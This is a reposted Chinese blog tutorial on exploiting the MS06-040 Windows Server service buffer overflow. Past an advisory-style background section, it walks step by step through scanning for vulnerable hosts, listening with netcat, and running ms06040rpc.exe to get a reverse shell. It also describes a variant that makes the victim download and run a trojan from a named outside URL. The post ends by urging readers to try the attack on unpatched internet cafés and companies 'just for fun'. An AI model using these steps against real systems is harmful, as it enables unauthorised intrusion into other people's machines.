博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
【转】基于溢出的入侵
阅读量:6477 次
发布时间:2019-06-23

本文共 2098 字,大约阅读时间需要 6 分钟。

背景                                                                                                                                                                

  Ms06040(Server服务中的缓冲区溢出漏洞)是继ms06035以后的又一个重大漏洞,利用此漏洞的魔波蠕虫已经开始蔓延,相信互连网又会因此掀起血雨腥风。

  此漏洞的影响范围有多大?

    这是一个远程执行代码漏洞。 成功利用此漏洞的攻击者可以远程完全控制受影响的系统。 攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。

  造成漏洞的原因是什么?

    Server 服务中未经检查的缓冲区。

  什么是 Server 服务?

    Server 服务通过网络提供 RPC 支持和文件打印支持以及命名管道共享。 Server 服务允许共享您的本地资源(例如磁盘和打印机),以便网络上的其他用户可以访问。 它还允许在其他计算机和您的计算机上运行的应用程序之间进行命名管道通信(用于 RPC)。

  攻击者可能利用此漏洞执行什么操作?

    成功利用此漏洞的攻击者可以完全控制受影响的系统。

  哪些人可能会利用此漏洞?

    任何可向受影响的系统传送特制消息的匿名用户都可以尝试利用此漏洞。

  攻击者能够如何利用此漏洞?

    攻击者可能试图通过创建特制的消息并将其发送到受影响的系统来利用此漏洞。 这样,这些消息可能导致受影响的系统执行代码。

  受此漏洞威胁最大的系统有哪些?

    所有工作站和服务器均受此问题的威胁,其中由于该漏洞的独特特征以及受影响的代码路径,Windows 2000 系统受到的威胁最大。

实战                                                                                                                                                                 

  首先我们弄了个扫描工具:rpc-server Scanner IP地址填入你想扫描的网段,点“扫描全部”。

  现在它已经开始工作了,去喝口水回来,已经全部扫描完毕

    

  看到没,显示Vulnerable的就说明存在漏洞我们来利用,首先在开始运行里打开CMD用nc监听一个端口。

    

  我这输入“Nc –l –vv –p 8888”, 监听8888端口。

  现在我们开始溢出这是它的说明:

    

  

Usage: ms06040rpc.exe 
ms06040rpc.exe
  
:    such as:http://192.168.0.128/test.exe   
: your host ip address   
:your host listenning port  
: 1: win 2000sp4 2:win xpsp1

  方法一:命令:ms06040rpc.exe  攻击的IP   你的IP   反弹端口 系统类型系统类型:“1”就是win 2000sp4“2”就是winxpsp1

      举例:ms06040rpc.exe 192.168.209.128 192.168.137.1 8888 1

方法二:命令:ms06040rpc.exe 你的木马地址系统类型

      举例:ms06040rpc.exe  192.168.209.128 http://www.hackbase.com/muma.exe 1溢出成功后就自动下载http://www.hackbase.com/muma.exe 并且执行

  我们这输入ms06040rpc.exe 192.168.209.128 192.168.137.1 8888 1 192.168.209.128就是我要攻击的IP,192.168.137.1就是我的IP,8888就是我刚才用Nc监听的8888端口

    

  提示发送成功

    

  OK,我们的得到了一个SHELL,可以随心的控制他了

最后                                                                                                                                                               

  很多人,包括一些大虾们都弄不懂为什么明明XPSP2和2003系统明明说了有漏洞可是不能利用呵呵,告诉大家,其实XPSP2用了DEP技术

  因为DEP能够对各种程序进行监视,阻止病毒在受保护的内存位置运行有害代码。DEP通过处理器的NX(No eXecute)功能,查找内存中没有明确包含可执行代码的数据(这些数据有时会是病毒的源代码),找到这些数据后,NX将它们都标记为“不可执行”。以后如果某程序在内存中,试图执行这些带“不可执行”标记的代码,SP2将会自动关闭该程序。因此,假如你运行了一个已经染毒的软件,DEP就会把病毒代码标记为“不可执行”,这样就能阻止病毒在内存中运行,保护电脑中的文件免受蠕虫、病毒的传染破坏。

  很多朋友犯迷糊了打个比方就是系统给每个合法的应用程序发一张名片,但是溢出程序的原理没有名片,就不能执行明白了吧,哈哈

  很多网吧,很多大公司都有没打补丁请大家小心利用。JUST FOR FUN!

 

本文转自我爱物联网博客园博客,原文链接:http://www.cnblogs.com/yydcdut/p/3515187.html,如需转载请自行联系原作者

你可能感兴趣的文章
MongoCola 1.01 发布 MongoDB管理工具
查看>>
SQL Server 的集合操作
查看>>
jQuery的get()post()getJson()方法
查看>>
Spark 基本函数学习笔记一
查看>>
USACO Friday the Thirteenth
查看>>
docker安装
查看>>
python算法与数据结构-选择排序(33)
查看>>
python算法与数据结构-插入排序(34)
查看>>
鱼儿溪水
查看>>
数据绑定:从DHTML迁移到Xmal(1)
查看>>
laravel基础课程---7、文件处理、闪存、cookie(cookie原理和使用场景)
查看>>
英语发音规则---oo
查看>>
算法总结---最常用的五大算法(算法题思路)
查看>>
ThinkPHP新建控制器
查看>>
ThinkPHP5.0框架开发--第7章 TP5.0数据库操作
查看>>
thinkphp5项目--个人博客(三)
查看>>
20145328《信息安全系统设计基础》第12周学习总结
查看>>
细说C语言的优先级和结合性
查看>>
C#的百度地图开发(三)依据坐标获取位置、商圈及周边信息
查看>>
常用网址
查看>>